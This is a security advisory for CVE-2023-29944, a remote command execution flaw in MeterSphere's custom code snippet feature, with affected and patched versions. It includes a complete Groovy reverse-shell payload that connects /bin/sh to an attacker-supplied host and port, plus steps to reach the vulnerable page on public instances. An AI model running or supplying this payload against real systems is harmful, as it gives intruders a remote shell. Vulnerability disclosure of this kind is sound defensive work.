Skip to content

CVE-2023-29944

High
fit2-zhao published GHSA-5473-9v2g-rpqm May 25, 2023

Package

No package listed

Affected versions

< v1.20.22 LTS

Patched versions

v1.20.23 LTS | v2.10 LTS

Description

Summary

Metersphere v1.20.20-lts-79d354a6 is vulnerable to Remote Command Execution. The system command reverse-shell can be executed at the custom code snippet function of the metersphere system workbench

Register account - enter the workbench
https://www.metersphere.com/index

Provide test account :

login and click enter the workbench

then splicing into https://cloud2.metersphere.com/#/project/code/segment

The system command reverse-shell can be executed at the custom code snippet function of the metersphere system workbench

Description

metersphere can realize RCE through custom func code

The location is at Workbench-Project Settings-Custom Code Snippets
Project Settings - Custom Code Snippet Select the groovy code and enter the following to receive the bounced shell

// PoC.js

groovy codes

String host="*.*.*.*";int port=42239;String cmd="/bin/sh";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); 

https://cloud.metersphere.com/#/project/code/segment

https://demo.metersphere.com/#/project/code/segment

view pic example:
https://hacku.top/wl/?id=WTuOyEeDyj2JsO5Toxd8wr242chVgSc1
https://hacku.top/wl/?id=Z2VBfKJZ2Fx0vMoXEVGo8EzMHAdlVlau

Severity

High

CVE ID

CVE-2023-29944

Weaknesses

No CWEs

Credits